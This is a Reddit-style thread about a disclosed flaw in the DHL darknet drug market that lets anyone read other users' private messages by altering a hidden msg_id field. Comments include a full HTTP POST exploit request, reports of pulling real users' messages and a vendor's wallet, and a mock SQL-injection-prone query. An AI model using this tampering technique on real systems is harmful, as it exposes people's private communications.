DHL Market Security Part 2 - All Private Messages Leaked

As part of our campaign of holding DHL accountable for their security vulnerabilities - we are now disclosing that the market contains a very simple bug that allows anybody to read any message on the site.

The details are here:

https://gist.github.com/anonymous/97d1e2319b78210606d41f3309aa4c21

If you're a researcher have a go at the site - almost none of the form parameters on the site are validated - this site is incredibly horrible and nobody should be using it.

The administrators of DHL have not replied to any of our previous reports nor messages and it has been over 48 hours. They have promised to give a "truthful" response and not delivered and referred to previous vulnerability disclosures as "reddit drama" and those reporting bugs as "clowns"

One more note - we are not going to put up with shit from admins, paid spokespeople or shill moderators any longer. We are no longer reporting vulnerabilities as we find them and we are sitting on many more - keep this in mind before you attempt to jump in again and deny or attempt to FUD in this sub.

Props to you-know-who for the tips, everyone working on the DNMs together and the peeps who have PM'd and messaged.


Comments


[83 Points] ostespiseren:

Unmod wombat, ban pelican from the subreddit for admitting to paid shilling, remove DHL from the list.


[50 Points] illegaltorrents:

Is Part 3 where you reveal that wombat is on the DHL support staff?


[31 Points] Egyptianscirocah:

I honestly hope you reconsider holding back bugs because of these mods. You should create your own subreddit or somewhere for people to see these.

I am trying to find my next replacement market that actually takes security seriously.


[26 Points] BlueWilderness:

i just pulled some pms using this https://paste.ee/p/sIczl


[20 Points] None:

P-please u/t0mcheck d-don't leave us. Not all of us are sucking mod dick. These guys are shitbags that have been doing everything they can to discredit you. I have no clue if any of this is real or not but judging by DHL's (response) or lack there of you hit them. It is absolutely pathetic what the mods have done here including the vendors/site owners.


[20 Points] None:

[deleted]


[18 Points] AI-Bourne:

You are a savage t0mcheck god damn bro slow down, give em some time to breath.


[14 Points] travis-:

Well im sure wombat thinks this is all normal and to just wait its fine.


[8 Points] None:

Thank you again mate.

Let's see how the usual shills try to deflect that.

Wombat, Pelican - over to you boys


[10 Points] TenXanTim:

This is just fucking disgusting /u/DHL-1 /u/DHL-3

Admins and staff alike at DHL should be ASHAMED of themselves.


[10 Points] DNSecurityConsultant:

Found a vendor's Bitcoin wallet with this:

Proof: http://matrixtxri745dfw.onion/neo/uploads/170803/MATRIX_191314_ucu_aaaaaaaa.png

Address: http://darkheroesq46awl.onion/account/message_view?msg_id=234248


[7 Points] Cocinacowboy:

Has anyone extracted any messages?


[9 Points] zysr90:

t0mcheck is making wombat look more rediculous by the day


[4 Points] kryptikmind:

Security is key, especially with how markets are being taken down currently.


[5 Points] DabbinOnMyboysD:

holy shit. Nice job Tom, i really appreciate you looking out for this community. I hope you stick around. Also nice job finding one of Pelis messages. I hope he's shitting himself.


[6 Points] Clix828:

Word man! I'll say this again, You are TRULY a HIGH valued asset to this community. Ignore the FUD, you are making it safer for us!


[6 Points] SpeedflyChris:

Fucking seriously? They made it that easy?


[5 Points] mjmedstarved:

slowclap


[5 Points] DNSecurityConsultant:

I can confirm this vulnerability. Fantastic!


[5 Points] DNSecurityConsultant:

Looks like my post might get buried at the bottom but I also found some vulnerabilities in DHL today: https://www.reddit.com/r/DarkNetMarkets/comments/6rfec4/dhl_security_advisory_url_redirect_captcha_bypass/


[5 Points] CipherYou:

Please note: previously the top comment on this thread was a highlighted comment from a moderator with the following:

when a vendor for example can confirm that tomcheck knows the contents of their messages then we can add one of those red warnings for dhl.

This comment has since been removed without explanation or update. If you visited this thread while this moderator comment was top comment and came away with the impression that the claims made in this post were not true or verified then you likely had the wrong impression.

The comment was deleted rather than retracted, and we have no update from the moderators on why it was deleted rather than retracted or updated.

Based on the absence of this latest security incident from the list of warnings against this market I believe that it is safe to assume that the moderators are not yet satisfied that this issue has been verified, while they are also no longer also requesting verification which means this post is currently in a state of moderator limbo.

/u/t0mcheck /u/wombat2combat


[3 Points] q123rumble:

... i would add my .02 BTC but no one would give a fuck ... so here i sit with my popcorn in one hand and my dick in another ;-)


[3 Points] justinherass99:

ROFL that's so fucking bad.


[3 Points] zysr90:

have my babies t0mcheck


[3 Points] tweaker_:

Don't ignore this man. Whether a bug is innocuous or harmful, the presence of technical flaws in a system (especially one that exists for the sole purpose of illegal activity) is indicative of the level of competence of those running the show. Attention to detail is important and the admins of DHL should be grateful the community is trying to help.

I've got a bit of skepticism that they'd want to suppress public disclosure of any known problems as to not affect profitability, and I'd bet that someone somewhere is getting paid to help silence any opposition.


[2 Points] elfer90:

for real, we the people


[2 Points] mrfloridamolly99:

--"On the message reply page there is a hidden field in the form called msg_id which is a unique and sequential message identifier. When replying to a message it will use this message ID to identify which message you are replying to. -If you change it to any other message id, you will be able to reply to that message (another users message) and you will then be given access to that message in your list of messages."--

THIS DOES NOT WORK. I am not a hacker but I tried this to attempt to verify myself.

When attempting to change msg_id the output is -INVALID MESSAGE NUMBER-

Maybe they patched it already or I'm not using the appropriate pentest tools or maybe its bullshit ??


[2 Points] 1499:

The popcorns popping


[2 Points] sharpshooter789:

Looks like DHL fixed the bug. Well, at least a GET request from the browser doesn't work anymore. I did see Tom provide a POST request. If I get some time I may bust out burpsuite and see if that will work.

edit: I should add this is a rookie mistake. Using hidden fields to hide data is as amatuer as it gets.


[1 Points] None:

thx for the heartattack... did you also try to login to different accounts? magically i got autologgedoff without even beeing logged in


[1 Points] 1ugly:

Yeah, they're all leaked, they're all pgp'd automatically.


[1 Points] xan-bar-fan:

Sounds like you guys are having a hard time taking down this market.


[1 Points] None:

Can some1 screenshot whats going on here?: http://talismanrestz7mr.onion/index.php?topic=13021.msg202352;topicseen#msg202352


[1 Points] klookass:

Which market should we be using instead? More i read about dream, more it makese me NOT wanna use it. Not because of any Le infiltration, but coz of general sloppiness.


[1 Points] None:

[deleted]


[1 Points] midnightmodders:

Your doing great work! Thanks for informing the community, if I may ask have you ever tested CGMC for security vulnerabilities? Would love to know.


[1 Points] sharpshooter789:

Scratch my previous post. This exploit does indeed work. Had to use BurpSuite and perform an HTTP POST

HOST /account/message HTTP/1.1
Host: darkheroesq46awl.onion
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://darkheroesq46awl.onion/account/message_view?msg_id=247563
Cookie: PHPSESSID=<CUT>; auth_hash=<CUT>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

msg_id=244359&recipient=tomcheck&reply=FEED+ME+MSG+DUMP%21&submit=Add+Repl

Here is a partial screen shot of the t0ms message thread (id=244359).

http://ibb.co/bQZBGa

Also a bonus. Someone pulled up checkpoints thread (id=234248). I got a screenshot of that too

http://ibb.co/j3SsNF


[1 Points] dncrumbs:

So that's two sites now that let anyone read any private message they want? I'd really love to see their code.

$result = mysql_query("SELECT * FROM messages WHERE id=$_POST['id']");

"Oops, we forgot the mysql_real_escape_string."

$result = mysql_query("SELECT * FROM messages WHERE id=" .mysql_real_escape_string($_POST['id']));

"There! Safe."


[-2 Points] wombat2combat:

when a vendor for example can confirm that tomcheck knows the contents of their messages then we can add one of those red warnings for dhl.

edit: a user apparently posted a message long dump from dhl, which could suffice as proof for the message leak [although tomcheck complained about dream getting a warning for a list of compromised accounts that surfaced from a pastebin post, now it is a similar situation with the dhl messages]. we superlist mods will now discuss how to proceed with the new evidence.


[-1 Points] 1ugly:

Yeah, they're all leaked, they're all pgp'd automatically.


[-1 Points] transamerican2:

@t0mcheck: only one thought if you don't mind:
in the good ole' SR-days pen-testers like you would've sent pm's to the site admins FIRST to report the vulnarabilities they had found. For sure they also asked for some bucks for their help (which is legit!!), but first they give the market-admins the chance to solve the probs before they leaked everything in the wild! Did you do this too?? If not, you are everything else than a helper of our movement! jmtc, stay safe all of you!